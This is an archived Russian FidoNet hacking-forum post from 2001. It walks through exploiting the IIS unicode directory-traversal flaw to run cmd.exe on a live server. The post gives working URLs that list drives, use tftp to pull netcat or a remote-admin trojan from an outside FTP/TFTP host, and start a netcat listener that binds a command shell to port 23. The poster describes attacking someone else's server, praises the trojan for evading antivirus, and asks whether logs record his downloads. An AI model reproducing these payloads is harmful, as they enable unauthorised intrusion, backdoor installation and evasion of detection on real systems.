|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : ‚« ¤ ЏҐаиЁ 2:5067/10.111 07 Jun 2001 20:41:07
To : All
Subject : юникодим сервак
--------------------------------------------------------------------------------
> Куда ты денешься, Andras, ты же на подводной лодке!
A> Проверить что работает эскплоит проще всего через распечатка дииректории
A> диска: (это известно всем)
Эт работает :)
A> http://202.131.3.900/scripts/..%255c..%255cWINNT/SYSTEM32/cmd.exe?/c+d
A> ir+C : \
Т.к scripts закрыта , давай рассмотрим мой случай на y2k IIS5:
111.222.333.444/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/
system32/cmd.exe?/c+dir+c:\
A> http://202.131.3.900/scripts/..%255c..%255cWINNT/SYSTEM32/netstat.exe?
A> -an
Кстати, netstat -an не пашет :)
A> http://202.131.3.900/scripts/..%255c..%255cWINNT/SYSTEM32/cmd.exe?/c+s
A> et
Это работает !
A> А вот как скопирвать файл туда?
Замечательный вопрос :) Сколько в нем изврата :)
A> (сначала запусти наподконтрольном компьютереTFTP server (нпр.
A> www.zdnet.com -tftpd32.exe)
За неимением своего, биру(или беру :) ,к примеру, ftp.os2.ru/incoming (r\w)
Hа атакуемом серваке есть свободный доступ по ФТП ридонли :(
A> положи туда какоенибудуть добро, нпр. NC.exe затем
залил на ftp.os2.ru/incoming файлик winoldap.exe (remote admin)
A> http://202.131.3.900/scripts/..%255c..%255cWINNT/SYSTEM32/tftp.exe?%20
A> -i%2
A> 0 1 11.222.333.444%20get%20nc.exe
A> (незабудь заменить 111.222.333.444 на тот ИП где твой тфтпсервак идет)
Сношался через 80 порт 20 мин и ни каких результатов :( Дело дошло до
изврата типа :
http://111.222.333.444/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63.
./winnt/system32/cmd.exe?/c+tftp.exe+-i+ftp.os2.ru/incoming+get+WINOLDAP.exe
Кстати, по дефолту куда этот файлик должен лечь ?
A> и теперь можно грузануть телнет у клиента
A> http://202.131.3.900/scripts/nc.exe?%20-l%20-L%20-d%20-p%2023%20-e%20c
A> :\winnt\system32\cmd.exe
Что-то мне не очень понятна строка, расшифруй по блокам плиз.
Кстати, через 80 папочка Inetpub неоткрывается :) А чо ?
A> и через ТЕЛHЕТ берем клиента по полной программе :))
A> лучше конено и здесь использовать свой NC.exe (nc ip port -vv) так как
A> ТЕЛHЕТ клиент посылает всякое недобро вначале диалога.
Remote Admin 2 Rulezz. Hе виден AVP, есть TELNET,... ect
ЗЫ. не могу понять какпопасть в эти папки ??? Только не говорите, что их
нет, у меня у самого на винте море таких (в FAR`e f7, alt+255, enter)
Directory of c:\Users\peerless
10/19/2000 04:55p <DIR> .
10/19/2000 04:55p <DIR> ..
> 09/04/2000 08:55a <DIR>
> 09/04/2000 08:55a <DIR>
> 10/19/2000 04:55p <DIR>
0 File(s) 0 bytes
5 Dir(s) 1,206,648,832 bytes free
Как туда прорваться ?
Скачать проще некуда -выкладываешь через 80 в папочку для ФТП, выкачиваешь,
удаляешь папку! Вопрос: В логах что-ньть вписалось, что я выкачал через ФТП?
ЗЫЫ, Срочно нужна готовая таблица символов в unicode. Поделитесь ?
-ДНэфэНД-
ЪД
АД У вАжЕнИеМ , ВлАд.
Чет Июн 07 2001 20:13
--- Fatal ERROR: Restart you life in MS-DOS Mode !
* Origin: Будут мысли-пишите, будут деньги-высылайте ! (2:5067/10.111)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
| Тема: |
Автор: |
Дата: |
|
юникодим сервак |
‚« ¤ ЏҐаиЁ |
07 Jun 2001 20:41:07 |
|
|
